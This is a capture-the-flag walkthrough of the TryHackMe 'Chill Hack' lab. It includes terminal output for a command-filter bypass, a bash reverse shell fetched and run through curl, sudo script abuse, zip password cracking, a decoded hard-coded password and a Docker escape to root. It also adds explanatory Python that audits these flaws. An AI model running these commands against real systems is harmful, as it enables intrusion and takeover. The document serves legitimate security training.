In this walkthrough we will go through the Chill Hack room from TryHackMe. The room is rated easy on the platform, but it will definitely test your basics and may throw you into a rabbit hole. In a nutshell, it tests your enumeration skills and how well you can bypass input blacklisting and validation, and along the way it challenges you with some system exploration and privilege escalation. So on that note, let's get started.
Machine Info:
Title      | Chill Hack
IP address | 10.10.253.182
Difficulty | Easy
Objective  | Chill the Hack out of the Machine.
Phase 1 – Enumeration
- First, check whether the machine is live by pinging it.
- Start with a regular nmap scan using the "-sS" and "-sV" flags. Found three common ports and services open: 21 (FTP), 22 (SSH) and 80 (HTTP).
wh1terose@fsociety:~$ sudo nmap -sS -sV 10.10.253.182
Nmap scan report for 10.10.253.182
Host is up (0.18s latency).
Not shown: 996 closed ports
PORT   STATE    SERVICE VERSION
21/tcp open     ftp     vsftpd 3.0.3
22/tcp open     ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
53/tcp filtered domain
80/tcp open     http    Apache httpd 2.4.29 ((Ubuntu))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.88 seconds
- I started with FTP and tried an anonymous login on the server. It succeeded and I found a note; downloading it to the local machine revealed a potential username.
wh1terose@fsociety:~$ ftp 10.10.253.182
Connected to 10.10.253.182.
220 (vsFTPd 3.0.3)
Name (10.10.253.182:wh1terose): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 1001     1001           90 Oct 03  2020 note.txt
226 Directory send OK.
ftp> get note.txt
local: note.txt remote: note.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for note.txt (90 bytes).
226 Transfer complete.
90 bytes received in 0.00 secs (45.8719 kB/s)
ftp> exit
221 Goodbye.
- Next I moved to port 80 (HTTP), starting by firing gobuster at it to reveal some juicy endpoints. Got something close to what I expected: a secret directory literally called "secret".
wh1terose@fsociety:~$ gobuster dir -u http://10.10.253.182/ -w ~/Desktop/Wordlist/common.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.253.182/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/wh1terose/Desktop/Wordlist/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2023/04/30 11:51:35 Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 278]
/.htaccess            (Status: 403) [Size: 278]
/.htpasswd            (Status: 403) [Size: 278]
/css                  (Status: 301) [Size: 312] [--> http://10.10.253.182/css/]
/fonts                (Status: 301) [Size: 314] [--> http://10.10.253.182/fonts/]
/images               (Status: 301) [Size: 315] [--> http://10.10.253.182/images/]
/index.html           (Status: 200) [Size: 35184]
/js                   (Status: 301) [Size: 311] [--> http://10.10.253.182/js/]
/secret               (Status: 301) [Size: 315] [--> http://10.10.253.182/secret/]
/server-status        (Status: 403) [Size: 278]
===============================================================
2023/04/30 11:53:03 Finished
===============================================================
- The secret directory contains a search field that executes commands on the underlying server; however, the input was filtered and only some commands were permitted. I tried "ls", which got "blocked", then "pwd", which worked.
Phase 2 – Initial Access
- Next I tried various commands I could work with, but to be honest I was banging my head against the wall on this for a while. Eventually I found that I could bypass the restriction on "ls" by inserting a backslash into it. Plus, the output of the restricted commands can be seen in the page's source code.
l\s -la
- As the list shows, there is no limitation on commands that can download content from the web, such as wget or curl. So I used the one-liner reverse shell below, fetched and executed with the help of curl, to get initial entry into the machine.
# bash reverse shell (shell.sh, served from the attacking machine on port 8000)
bash -i >& /dev/tcp/10.18.11.103/4444 0>&1

# Execute the shell using the curl command (with the same backslash trick applied to bash)
curl 10.18.11.103:8000/shell.sh | ba\sh
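Why the `l\s` and `ba\sh` tricks get past the filter, as an added example that is not part of the original post or of the room's code: a denylist looks for substrings in the raw string, but the shell strips the backslash before it resolves the command, so the string the filter inspected and the command the shell ran are different. The Python below uses shlex (which follows the same escaping rules as a POSIX shell) to show the two views side by side, and contrasts the denylist with an allowlist that validates the parsed argument vector and executes it without a shell. The blocked-word list, the allowed commands and the 10.0.0.1 address are constructed for illustration; the room's actual filter was not shown in the post.

```python
import re
import shlex
import subprocess

# Constructed stand-in for the room's filter (assumption): the post only shows
# that "ls" was blocked, "pwd" passed, and curl/wget were not restricted.
BLOCKED_SUBSTRINGS = ("ls", "bash", "nc")

# Allowlist for the hardened version (assumption, chosen for illustration).
ALLOWED_COMMANDS = {"pwd", "id", "whoami", "date"}
SAFE_ARG = re.compile(r"^[A-Za-z0-9._/-]+$")


def naive_blacklist_allows(raw: str) -> bool:
    """Denylist check on the raw string, the way a substring filter sees the input."""
    return not any(bad in raw for bad in BLOCKED_SUBSTRINGS)


def shell_sees(raw: str) -> list:
    """Argument vector a POSIX shell derives from the raw string after escape
    and quote processing: a backslash outside quotes is dropped, so l\\s -> ls."""
    return shlex.split(raw)


def allowlist_accepts(raw: str) -> bool:
    """Validate after parsing, not before: the command word must be on the
    allowlist and every argument must be a plain token (no metacharacters)."""
    try:
        argv = shlex.split(raw)
    except ValueError:          # unbalanced quotes: reject rather than guess
        return False
    if not argv or argv[0] not in ALLOWED_COMMANDS:
        return False
    return all(SAFE_ARG.match(arg) for arg in argv[1:])


def run_allowlisted(raw: str) -> str:
    """Execute a validated argv with shell=False, so pipes, semicolons and
    backslash games never reach an interpreter; returns captured stdout."""
    if not allowlist_accepts(raw):
        raise PermissionError("command rejected: " + raw)
    argv = shlex.split(raw)
    result = subprocess.run(argv, capture_output=True, text=True, timeout=5)
    return result.stdout.strip()


if __name__ == "__main__":
    probes = (
        "pwd",
        "ls -la",
        r"l\s -la",                         # the bypass used in the room
        r"curl 10.0.0.1:8000/shell.sh | ba\sh",  # constructed address
        "pwd; id",
    )
    for probe in probes:
        print(f"{probe!r:45} denylist={naive_blacklist_allows(probe)!s:5} "
              f"shell_sees={shell_sees(probe)} allowlist={allowlist_accepts(probe)}")
```

The denylist passes `l\s -la` because the substring `ls` is not present in the text it checks, while `shell_sees` shows that the shell would run exactly `ls -la`; the allowlist rejects it because the decision is made on the parsed command word, and `run_allowlisted` never hands the string to `sh -c` at all.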
Phase 3 – Further exploitation & exploration
- Once I had my initial shell, I listed the sudo configuration for the current user. Found that a script called .helpline.sh can be executed as the user apaar.
www-data@ubuntu:/var/www/html/secret$ sudo -l
sudo -l
Matching Defaults entries for www-data on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on ubuntu:
    (apaar : ALL) NOPASSWD: /home/apaar/.helpline.sh
www-data@ubuntu:/var/www/html/secret$
- Peeking into the script to understand what it does: at the end, the variable $msg takes user input and is executed as a command, which we will exploit later. But first, let's stabilize our shell.
www-data@ubuntu:/var/www/html/secret$ cat /home/apaar/.helpline.sh
cat /home/apaar/.helpline.sh
#!/bin/bash

echo
echo "Welcome to helpdesk. Feel free to talk to anyone at any time!"
echo

read -p "Enter the person whom you want to talk with: " person
read -p "Hello user! I am $person,  Please enter your message: " msg

$msg 2>/dev/null

echo "Thank you for your precious time!"
www-data@ubuntu:/var/www/html/secret$
- Upgrading the shell to a full TTY.
www-data@ubuntu:/var/www/html/secret$ python3 -c 'import pty;pty.spawn("/bin/bash")'
<ret$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@ubuntu:/var/www/html/secret$ ^Z
[1]+  Stopped                 nc -lvnp 4444
wh1terose@fsociety:~/CTF/TryHackme/Chill Hack$ stty raw -echo;fg
nc -lvnp 4444
www-data@ubuntu:/var/www/html/secret$ stty rows 29 columns 126
www-data@ubuntu:/var/www/html/secret$ export TERM=success
www-data@ubuntu:/var/www/html/secret$
- Now we exploit that variable ($msg) to get a shell as apaar and finally grab our user flag.
www-data@ubuntu:/var/www/html/secret$ sudo -u apaar /home/apaar/.helpline.sh

Welcome to helpdesk. Feel free to talk to anyone at any time!

Enter the person whom you want to talk with: ian
Hello user! I am ian,  Please enter your message: /bin/bash
python3 -c 'import pty;pty.spawn("/bin/bash")'
apaar@ubuntu:/var/www/html/secret$ ls
images  index.php
apaar@ubuntu:/var/www/html/secret$ cat /home/apaar/local.txt
{USER-FLAG: e8vpd3323cfvlp0qpxxx9qtr5iq37oww}
apaar@ubuntu:/var/www/html/secret$
Phase 4 – Privilege Escalation
- Earlier I missed a port that was actually open: 8000. There I found an image, which I downloaded and ran through steghide to extract the hidden data. The hidden data turned out to be a password-protected zip file, so I used john to crack the zip password. Opening the zip with the recovered password reveals a source code file.
# Getting the image file from the server.
wh1terose@fsociety:~/CTF/TryHackme/Chill Hack$ wget http://10.10.251.210:8000/hacker-with-laptop_23-2147985341.jpg
--2023-04-30 13:43:02--  http://10.10.251.210:8000/hacker-with-laptop_23-2147985341.jpg
Connecting to 10.10.251.210:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 68841 (67K) [image/jpeg]
Saving to: ‘hacker-with-laptop_23-2147985341.jpg’

hacker-with-laptop_2 100%[====================>]  67.23K  41.6KB/s    in 1.6s

2023-04-30 13:43:04 (41.6 KB/s) - ‘hacker-with-laptop_23-2147985341.jpg’ saved [68841/68841]

# Extracting data with steghide.
wh1terose@fsociety:~/CTF/TryHackme/Chill Hack$ steghide --extract -sf hacker-with-laptop_23-2147985341.jpg
Enter passphrase:
wrote extracted data to "backup.zip".
wh1terose@fsociety:~/CTF/TryHackme/Chill Hack$ unzip backup.zip
Archive:  backup.zip
[backup.zip] source_code.php password:
   skipping: source_code.php         incorrect password

# Using john to crack the password of the zip file.
wh1terose@fsociety:~/CTF/TryHackme/Chill Hack$ ~/Tools/john/run/zip2john backup.zip > crack.txt
ver 2.0 efh 5455 efh 7875 backup.zip/source_code.php PKZIP Encr: TS_chk, cmplen=554, decmplen=1211, crc=69DC82F3 ts=2297 cs=2297 type=8
wh1terose@fsociety:~/CTF/TryHackme/Chill Hack$ ~/Tools/john/run/john crack.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 8 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, 'h' for help, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
0g 0:00:00:00 DONE 1/3 (2023-04-30 13:46) 0g/s 1340Kp/s 1340Kc/s 1340KC/s Phpsource1900..Pcode1900
Proceeding with wordlist:/home/wh1terose/Tools/john/run/password.lst
Enabling duplicate candidate password suppressor
pass1word        (backup.zip/source_code.php)
1g 0:00:00:00 DONE 2/3 (2023-04-30 13:46) 7.142g/s 595814p/s 595814c/s 595814C/s 123456..abundance
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
- Diving into the source code, we can see a base64-encoded password for the user Anurodh. You know where this is going now.
<html>
<head> Admin Portal </head>
<title> Site Under Development ... </title>
<body>
<form method="POST">
    Username: <input type="text" name="name" placeholder="username"><br><br>
    Email: <input type="email" name="email" placeholder="email"><br><br>
    Password: <input type="password" name="password" placeholder="password">
    <input type="submit" name="submit" value="Submit">
</form>
<?php
if(isset($_POST['submit']))
{
    $email = $_POST["email"];
    $password = $_POST["password"];
    if(base64_encode($password) == "IWQwbnRLbjB3bVlwQHNzdzByZA==")
    {
        $random = rand(1000,9999);?><br><br><br>
        <form method="POST">
            Enter the OTP: <input type="number" name="otp">
            <input type="submit" name="submitOtp" value="Submit">
        </form>
<?php
        mail($email,"OTP for authentication",$random);
        if(isset($_POST["submitOtp"]))
        {
            $otp = $_POST["otp"];
            if($otp == $random)
            {
                echo "Welcome Anurodh!";
                header("Location: authenticated.php");
            }
            else
            {
                echo "Invalid OTP";
            }
        }
    }
    else
    {
        echo "Invalid Username or Password";
    }
}
?>
</html>
- I used CyberChef to decode the encoded password and found: !d0ntKn0wmYp@ssw0rd
- With the new username and password, we log into the SSH server to move ahead in our privilege escalation journey for this box.
- To get a root shell and the flag, I exploited the Docker instance with a one-liner from GTFOBins. The ubuntu image could not be pulled, so I used the alpine image that was already present locally.
anurodh@ubuntu:~$ docker -H unix:///var/run/docker.sock run -v /:/host -it ubuntu chroot /host /bin/bash
Unable to find image 'ubuntu:latest' locally
docker: Error response from daemon: Get https://registry-1.docker.io/v2/: net/http: request canceled while waiting for connection (Client.Timeout exceeded while awaiting headers).
See 'docker run --help'.
anurodh@ubuntu:~$ docker images
REPOSITORY    TAG       IMAGE ID       CREATED       SIZE
alpine        latest    a24bb4013296   2 years ago   5.57MB
hello-world   latest    bf756fb1ae65   3 years ago   13.3kB
anurodh@ubuntu:~$ docker -H unix:///var/run/docker.sock run -v /:/host -it alpine chroot /host /bin/bash
groups: cannot find name for group ID 11
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

root@fd09d321605c:/# cd /root
root@fd09d321605c:~# ls
proof.txt
root@fd09d321605c:~# cat proof.txt
{ROOT-FLAG: w18gfpn9xehsgd3tovhk0hby4gdp89bg}

Congratulations! You have successfully completed the challenge.

[ASCII-art banner omitted]

--------------------------------------------Designed By -------------------------------------------------------
                                              | Anurodh Acharya |
                                              ---------------------

        Let me know if you liked it.
        Twitter - @acharya_anurodh
        Linkedin - www.linkedin.com/in/anurodh-acharya-b1937116a
root@fd09d321605c:~#
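The three weaknesses chained in Phases 3 and 4 (a NOPASSWD sudo rule pointing at a script in a home directory that runs user input as a command, a login check that compares base64 of the password to a literal, and an account that can drive the Docker socket) are all visible in configuration and source before anyone exploits them. The audit below is an added example, not code from the post or from the room, that flags each of them. Every input is constructed inline: the sudoers line and the script mirror the `sudo -l` output and `.helpline.sh` shown above, the PHP fragment keeps the page's base64 literal, and the /etc/group line is an assumption standing in for the fact that anurodh could use the Docker socket without sudo (the post does not show /etc/group).

```python
import base64
import re

# Constructed inputs for this example (not captured files from the room).
SUDOERS_LINES = [
    "Defaults env_reset",
    "root    ALL=(ALL:ALL) ALL",
    "www-data ALL=(apaar) NOPASSWD: /home/apaar/.helpline.sh",
]

HELPLINE_SH = """#!/bin/bash
echo "Welcome to helpdesk. Feel free to talk to anyone at any time!"
read -p "Enter the person whom you want to talk with: " person
read -p "Hello user! I am $person, Please enter your message: " msg
$msg 2>/dev/null
echo "Thank you for your precious time!"
"""

LOGIN_PHP = '''<?php
if(base64_encode($password) == "IWQwbnRLbjB3bVlwQHNzdzByZA==") { echo "Welcome Anurodh!"; }
?>'''

# Assumption: the post never shows /etc/group; this line models docker-group membership.
ETC_GROUP = ["root:x:0:", "sudo:x:27:anurodh", "docker:x:999:anurodh"]

# sudoers user specification: who host=(runas) [TAG: ...] command[, command...]
SUDOERS_RE = re.compile(
    r"^(?P<who>\S+)\s+\S+=\((?P<runas>[^)]+)\)\s+(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$"
)


def risky_nopasswd_entries(lines):
    """NOPASSWD rules whose target is ALL or lives under /home: the listed
    account can switch identity with no credential, into a user-owned file."""
    findings = []
    for line in lines:
        m = SUDOERS_RE.match(line.strip())
        if not m or "NOPASSWD" not in m.group("tags"):
            continue
        for cmd in m.group("cmds").split(","):
            path = cmd.strip().split()[0]
            if path == "ALL" or path.startswith("/home/"):
                findings.append((m.group("who"), m.group("runas"), path))
    return findings


# A line whose command word is itself a variable expansion: input is run, not shown.
VAR_AS_COMMAND = re.compile(r"^\s*\$\{?\w+\}?(\s|$)")


def variables_run_as_commands(script):
    """1-based line numbers where a shell variable is used as the command word."""
    return [n for n, line in enumerate(script.splitlines(), 1)
            if VAR_AS_COMMAND.match(line)]


# A password check that compares an encoding of the input against a string literal.
HARDCODED_CMP = re.compile(r'base64_encode\(\s*\$\w+\s*\)\s*===?\s*"([A-Za-z0-9+/=]+)"')


def hardcoded_password_compares(php_source):
    """Literals compared to base64_encode($input). base64 is an encoding, not a
    hash, so each literal decodes straight back to the accepted password."""
    return [base64.b64decode(m.group(1)).decode()
            for m in HARDCODED_CMP.finditer(php_source)]


def docker_group_members(group_lines):
    """Members of the docker group: write access to the Docker socket lets a user
    mount the host filesystem into a container, which is equivalent to root."""
    for line in group_lines:
        name, _passwd, _gid, members = line.split(":", 3)
        if name == "docker":
            return [m for m in members.split(",") if m]
    return []


if __name__ == "__main__":
    print("NOPASSWD rules into /home      :", risky_nopasswd_entries(SUDOERS_LINES))
    print("variable run as command, lines :", variables_run_as_commands(HELPLINE_SH))
    print("recoverable password literals  :", hardcoded_password_compares(LOGIN_PHP))
    print("docker group members           :", docker_group_members(ETC_GROUP))
```

Each check maps to a fix: drop the NOPASSWD rule or point it at a root-owned script outside /home, make the script print `"$msg"` instead of expanding it as a command, store a salted password hash instead of a base64 literal, and keep accounts out of the docker group unless they are meant to be root.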
Conclusion:
So that was "Chill Hack" for you. Trust me, it wasn't chill for me. It was meant to be an easy box, yet at some points it had me going around in circles. Summing it up: we started with an nmap scan and found the usual FTP, SSH and HTTP ports open. On FTP, an anonymous login got us the note.txt file, which revealed a potential username. On the web side, gobuster revealed a secret directory holding a command field that executes commands on the underlying operating system; abusing it with curl gave us initial access. Checking the sudo configuration revealed a script that can be run as the user apaar; we stabilized the shell and exploited the script to get a shell as apaar. We had also missed port 8000, which was running an additional server hosting an image file; extracting its hidden content with steghide produced a backup.zip file, and john cracked the zip password. The zip contained source code with a hard-coded password for the user anurodh, which we decoded and used to gain further access over SSH. Finally, we exploited the Docker misconfiguration to get the root flag and my old forgotten nudes.